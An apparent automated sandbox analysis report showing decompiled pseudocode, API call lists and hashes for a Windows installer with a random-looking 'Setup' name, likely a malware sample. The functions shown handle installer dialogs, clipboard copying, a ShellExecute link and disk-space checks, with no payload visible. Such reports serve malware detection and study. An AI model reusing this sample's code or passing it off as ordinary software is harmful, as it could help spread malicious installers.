								_v60 = _t149;
								_v48 = 0x42a0a0;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x42e3ec - _t149; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42ec28, 8);
							__eflags =  *0x42ecac - _t149; // 0x0
							if(__eflags == 0) {
								E00404EB3( *((intOrPtr*)( *0x429870 + 0x34)), _t149);
							}
							E00403E5C(1);
							goto L25;
						}
						 *0x429468 = 2;
						E00403E5C(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403EEA(_a8, _a12, _a16);
						}
						ShowWindow( *0x42e3f0, _t149);
						ShowWindow(_t154, 8);
						E00403EB8(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x42ec30; // 0x6dc460
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x42e3f0 = GetDlgItem(_a4, 0x403);
				 *0x42e3e8 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x42e404 = _t127;
				_v8 = _t127;
				E00403EB8( *0x42e3f0);
				 *0x42e3f4 = E00404755(4);
				 *0x42e40c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403E83(_a4);
				if(( *0x42ec38 & 0x00000003) != 0) {
					ShowWindow( *0x42e3f0, _t149);
					if(( *0x42ec38 & 0x00000002) != 0) {
						 *0x42e3f0 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403EB8( *0x42e3e8);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x42ec38 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}


































                                                                                            0x00404ffa
                                                                                            0x00405000
                                                                                            0x00405009
                                                                                            0x0040500c
                                                                                            0x0040519d
                                                                                            0x004051a4
                                                                                            0x004051c8
                                                                                            0x004051c8
                                                                                            0x004051ce
                                                                                            0x004051db
                                                                                            0x004051f9
                                                                                            0x004051f9
                                                                                            0x00405200
                                                                                            0x00405257
                                                                                            0x00405257
                                                                                            0x0040525b
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040525d
                                                                                            0x00405260
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040526a
                                                                                            0x00405270
                                                                                            0x00405272
                                                                                            0x00405275
                                                                                            0x0040536e
                                                                                            0x00000000
                                                                                            0x0040536e
                                                                                            0x00405284
                                                                                            0x00405290
                                                                                            0x00405296
                                                                                            0x00405299
                                                                                            0x0040529c
                                                                                            0x004052b1
                                                                                            0x004052b4
                                                                                            0x004052b4
                                                                                            0x004052b7
                                                                                            0x0040529e
                                                                                            0x004052a3
                                                                                            0x004052a9
                                                                                            0x004052ac
                                                                                            0x004052ac
                                                                                            0x004052c7
                                                                                            0x004052cf
                                                                                            0x004052d0
                                                                                            0x004052d2
                                                                                            0x004052db
                                                                                            0x004052de
                                                                                            0x004052e5
                                                                                            0x004052ec
                                                                                            0x004052f4
                                                                                            0x004052f4
                                                                                            0x00405302
                                                                                            0x00405308
                                                                                            0x0040530b
                                                                                            0x0040530b
                                                                                            0x00405312
                                                                                            0x00405318
                                                                                            0x00405321
                                                                                            0x00405328
                                                                                            0x00405331
                                                                                            0x00405333
                                                                                            0x00405336
                                                                                            0x00405345
                                                                                            0x00405347
                                                                                            0x0040534d
                                                                                            0x0040534e
                                                                                            0x0040534f
                                                                                            0x0040534f
                                                                                            0x00405357
                                                                                            0x00405362
                                                                                            0x00405368
                                                                                            0x00405368
                                                                                            0x00000000
                                                                                            0x004052d2
                                                                                            0x00405202
                                                                                            0x00405208
                                                                                            0x00405238
                                                                                            0x0040523a
                                                                                            0x00405240
                                                                                            0x0040524b
                                                                                            0x0040524b
                                                                                            0x00405252
                                                                                            0x00000000
                                                                                            0x00405252
                                                                                            0x0040520c
                                                                                            0x00405216
                                                                                            0x00000000
                                                                                            0x004051dd
                                                                                            0x004051dd
                                                                                            0x004051e3
                                                                                            0x0040521b
                                                                                            0x00000000
                                                                                            0x00405224
                                                                                            0x004051ec
                                                                                            0x004051f1
                                                                                            0x004051f4
                                                                                            0x00000000
                                                                                            0x004051f4
                                                                                            0x004051db
                                                                                            0x00405012
                                                                                            0x00405016
                                                                                            0x0040501f
                                                                                            0x00405026
                                                                                            0x00405029
                                                                                            0x0040502c
                                                                                            0x0040502f
                                                                                            0x00405030
                                                                                            0x00405031
                                                                                            0x0040504a
                                                                                            0x0040504d
                                                                                            0x00405057
                                                                                            0x00405066
                                                                                            0x0040506e
                                                                                            0x00405076
                                                                                            0x0040507b
                                                                                            0x0040507e
                                                                                            0x0040508a
                                                                                            0x00405093
                                                                                            0x0040509c
                                                                                            0x004050bf
                                                                                            0x004050c5
                                                                                            0x004050d6
                                                                                            0x004050db
                                                                                            0x004050e9
                                                                                            0x004050f7
                                                                                            0x004050f7
                                                                                            0x004050fc
                                                                                            0x0040510a
                                                                                            0x0040510a
                                                                                            0x0040510f
                                                                                            0x00405112
                                                                                            0x00405117
                                                                                            0x00405123
                                                                                            0x0040512c
                                                                                            0x00405139
                                                                                            0x00405148
                                                                                            0x0040513b
                                                                                            0x00405140
                                                                                            0x00405140
                                                                                            0x00405154
                                                                                            0x00405154
                                                                                            0x00405168
                                                                                            0x00405171
                                                                                            0x0040517a
                                                                                            0x0040518a
                                                                                            0x00405196
                                                                                            0x00405196
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • GetDlgItem.USER32 ref: 00405050
                                                                                            • GetDlgItem.USER32 ref: 0040505F
                                                                                            • GetClientRect.USER32 ref: 0040509C
                                                                                            • GetSystemMetrics.USER32 ref: 004050A4
                                                                                            • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 004050C5
                                                                                            • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004050D6
                                                                                            • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 004050E9
                                                                                            • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 004050F7
                                                                                            • SendMessageA.USER32(?,00001024,00000000,?), ref: 0040510A
                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040512C
                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405140
                                                                                            • GetDlgItem.USER32 ref: 00405161
                                                                                            • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405171
                                                                                            • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040518A
                                                                                            • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405196
                                                                                            • GetDlgItem.USER32 ref: 0040506E
                                                                                              • Part of subcall function 00403EB8: SendMessageA.USER32(00000028,?,00000001,00403CE9), ref: 00403EC6
                                                                                            • GetDlgItem.USER32 ref: 004051B3
                                                                                            • CreateThread.KERNEL32 ref: 004051C1
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004051C8
                                                                                            • ShowWindow.USER32(00000000), ref: 004051EC
                                                                                            • ShowWindow.USER32(00000000,00000008), ref: 004051F1
                                                                                            • ShowWindow.USER32(00000008), ref: 00405238
                                                                                            • SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 0040526A
                                                                                            • CreatePopupMenu.USER32 ref: 0040527B
                                                                                            • AppendMenuA.USER32 ref: 00405290
                                                                                            • GetWindowRect.USER32 ref: 004052A3
                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004052C7
                                                                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405302
                                                                                            • OpenClipboard.USER32(00000000), ref: 00405312
                                                                                            • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405318
                                                                                            • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405321
                                                                                            • GlobalLock.KERNEL32 ref: 0040532B
                                                                                            • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040533F
                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405357
                                                                                            • SetClipboardData.USER32 ref: 00405362
                                                                                            • CloseClipboard.USER32 ref: 00405368
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                            • String ID: {
                                                                                            • API String ID: 590372296-366298937
                                                                                            • Opcode ID: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
                                                                                            • Instruction ID: 14fcdc656e1060cfbb0aff817b75222918c1b3830be54c9a3b8aebe23af76a49
                                                                                            • Opcode Fuzzy Hash: 5894735c6d9b26e843971f9630d97cc706520b5bf8544c8db5e3cdb289504f93
                                                                                            • Instruction Fuzzy Hash: 0BA13A71900208FFDB11AFA1DC89AAF7F79FB04355F00817AFA05AA2A0C7755A41DF99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00403FCB, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 93%
                                                                                            			E00403FCB(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				intOrPtr _t71;
				intOrPtr _t85;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42a080 =  *0x42a080 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00403EEA(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x42dbc0;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x42ec28, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x42ec28, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42a080 != 0) {
						goto L25;
					} else {
						_t112 =  *0x429870 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00403EA5(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404256();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x42e3fc; // 0x6e1cac
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_t71 =  *0x42ec58; // 0x6e07e0
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 + _t71;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E00403F97;
				E00403E83(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403E83(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403EA5( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403EB8(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t85 =  *0x42ec30; // 0x6dc460
				_t86 =  *(_t85 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x429064 =  *0x429064 & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x42a080 =  *0x42a080 & 0x00000000;
				return 0;
			}




















                                                                                            0x00403fdb
                                                                                            0x00404101
                                                                                            0x0040415d
                                                                                            0x00404161
                                                                                            0x00404238
                                                                                            0x0040423a
                                                                                            0x0040423a
                                                                                            0x00404240
                                                                                            0x00404240
                                                                                            0x00404243
                                                                                            0x00000000
                                                                                            0x0040424a
                                                                                            0x0040416f
                                                                                            0x00404171
                                                                                            0x0040417b
                                                                                            0x00404186
                                                                                            0x00404189
                                                                                            0x0040418c
                                                                                            0x00404197
                                                                                            0x0040419a
                                                                                            0x004041a1
                                                                                            0x004041af
                                                                                            0x004041c7
                                                                                            0x004041da
                                                                                            0x004041ea
                                                                                            0x004041ec
                                                                                            0x004041ec
                                                                                            0x004041a1
                                                                                            0x004041f6
                                                                                            0x00000000
                                                                                            0x00404201
                                                                                            0x00404205
                                                                                            0x00404216
                                                                                            0x00404216
                                                                                            0x0040421c
                                                                                            0x0040422a
                                                                                            0x0040422a
                                                                                            0x00000000
                                                                                            0x0040422e
                                                                                            0x004041f6
                                                                                            0x0040410c
                                                                                            0x00000000
                                                                                            0x00404120
                                                                                            0x00404126
                                                                                            0x0040412c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00404151
                                                                                            0x00404153
                                                                                            0x00404158
                                                                                            0x00000000
                                                                                            0x00404158
                                                                                            0x0040410c
                                                                                            0x00403fe1
                                                                                            0x00403fe4
                                                                                            0x00403fe9
                                                                                            0x00403feb
                                                                                            0x00403ffa
                                                                                            0x00403ffa
                                                                                            0x00403ffc
                                                                                            0x00404001
                                                                                            0x00404004
                                                                                            0x00404006
                                                                                            0x0040400b
                                                                                            0x00404014
                                                                                            0x0040401a
                                                                                            0x00404026
                                                                                            0x00404029
                                                                                            0x00404032
                                                                                            0x00404037
                                                                                            0x0040403a
                                                                                            0x0040403f
                                                                                            0x00404056
                                                                                            0x0040405d
                                                                                            0x00404070
                                                                                            0x00404073
                                                                                            0x00404088
                                                                                            0x0040408a
                                                                                            0x0040408f
                                                                                            0x00404094
                                                                                            0x00404099
                                                                                            0x00404099
                                                                                            0x004040a8
                                                                                            0x004040b7
                                                                                            0x004040b9
                                                                                            0x004040cf
                                                                                            0x004040de
                                                                                            0x004040e0
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • CheckDlgButton.USER32 ref: 00404056
                                                                                            • GetDlgItem.USER32 ref: 0040406A
                                                                                            • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404088
                                                                                            • GetSysColor.USER32(?), ref: 00404099
                                                                                            • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 004040A8
                                                                                            • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 004040B7
                                                                                            • lstrlenA.KERNEL32(?), ref: 004040C1
                                                                                            • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 004040CF
                                                                                            • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004040DE
                                                                                            • GetDlgItem.USER32 ref: 00404141
                                                                                            • SendMessageA.USER32(00000000), ref: 00404144
                                                                                            • GetDlgItem.USER32 ref: 0040416F
                                                                                            • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 004041AF
                                                                                            • LoadCursorA.USER32 ref: 004041BE
                                                                                            • SetCursor.USER32(00000000), ref: 004041C7
                                                                                            • ShellExecuteA.SHELL32(0000070B,open,0042DBC0,00000000,00000000,00000001), ref: 004041DA
                                                                                            • LoadCursorA.USER32 ref: 004041E7
                                                                                            • SetCursor.USER32(00000000), ref: 004041EA
                                                                                            • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404216
                                                                                            • SendMessageA.USER32(00000010,00000000,00000000), ref: 0040422A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                            • String ID: N$gqeqcda$open
                                                                                            • API String ID: 3615053054-3362663662
                                                                                            • Opcode ID: c58a0b319f6ceee57a7eba4f5dbe9c3c6e8762fb962b098a8fd1953549ce9262
                                                                                            • Instruction ID: 220b67e7875a360065d3b56f20ed6dbf7aa7168a1850c9919f5fb7903a7ea725
                                                                                            • Opcode Fuzzy Hash: c58a0b319f6ceee57a7eba4f5dbe9c3c6e8762fb962b098a8fd1953549ce9262
                                                                                            • Instruction Fuzzy Hash: C861F271A40309BFEB109F61CC45F6A3B69FB44715F10403AFB04BA2D1C7B8AA51CB99
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00401000, Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 125COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 90%
                                                                                            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				intOrPtr _t115;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42ec30; // 0x6dc460
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, "gqjlpjiaybpobgywdcz Setup", 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					_t115 =  *0x42ec28; // 0xd0404
					 *((intOrPtr*)(_t102 + 4)) = _t115;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}














                                                                                            0x0040100a
                                                                                            0x00401039
                                                                                            0x00401047
                                                                                            0x0040104d
                                                                                            0x00401051
                                                                                            0x0040105b
                                                                                            0x00401061
                                                                                            0x00401064
                                                                                            0x004010f3
                                                                                            0x00401089
                                                                                            0x0040108c
                                                                                            0x004010a6
                                                                                            0x004010bd
                                                                                            0x004010cc
                                                                                            0x004010cf
                                                                                            0x004010d5
                                                                                            0x004010d9
                                                                                            0x004010e4
                                                                                            0x004010ed
                                                                                            0x004010ef
                                                                                            0x004010ef
                                                                                            0x00401100
                                                                                            0x00401105
                                                                                            0x0040110d
                                                                                            0x00401110
                                                                                            0x00401112
                                                                                            0x00401118
                                                                                            0x0040111f
                                                                                            0x00401126
                                                                                            0x00401130
                                                                                            0x00401142
                                                                                            0x00401156
                                                                                            0x00401160
                                                                                            0x00401165
                                                                                            0x00401165
                                                                                            0x00401110
                                                                                            0x0040116e
                                                                                            0x00000000
                                                                                            0x00401178
                                                                                            0x00401010
                                                                                            0x00401013
                                                                                            0x00401015
                                                                                            0x00401019
                                                                                            0x0040101f
                                                                                            0x0040101f
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                            • BeginPaint.USER32(?,?), ref: 00401047
                                                                                            • GetClientRect.USER32 ref: 0040105B
                                                                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                            • FillRect.USER32 ref: 004010E4
                                                                                            • DeleteObject.GDI32(?), ref: 004010ED
                                                                                            • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                            • SetTextColor.GDI32(00000000,?), ref: 00401130
                                                                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                            • DrawTextA.USER32(00000000,gqjlpjiaybpobgywdcz Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                            • DeleteObject.GDI32(?), ref: 00401165
                                                                                            • EndPaint.USER32(?,?), ref: 0040116E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000027.00000002.776267433.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000027.00000002.776225770.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776324072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776362591.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776529964.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776577449.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776659350.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000027.00000002.776751775.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                            • String ID: F$gqjlpjiaybpobgywdcz Setup
                                                                                            • API String ID: 941294808-346492725
                                                                                            • Opcode ID: 05bbfc508ef237e24a9817a54f4a45d084594548d285a69524b208d70469c4e1
                                                                                            • Instruction ID: 9dd9d9e9de989eb397972ae7cf78bef649c8fbd879b4abede4b5176bd3adbacf
                                                                                            • Opcode Fuzzy Hash: 05bbfc508ef237e24a9817a54f4a45d084594548d285a69524b208d70469c4e1
                                                                                            • Instruction Fuzzy Hash: 08419D71804249AFCB058F95DD459BFBFB9FF44314F00802AF951AA1A0C738E951DFA5
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004042C1, Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 273stringCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 78%
                                                                                            			E004042C1(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr _t124;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x429870;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x42f000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E0040546C(0x3fb, _t146);
					E00405E29(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040546C(0x3fb, _t146);
							if(E0040579B(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405BC7(0x429068, _t146);
							_t87 = E00405F57(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405BC7(0x429068, _t146);
								_t89 = E0040574E(0x429068);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x429068,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x429068) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x429068,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t159 = E00405701(0x429068) - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x429068) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404755(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
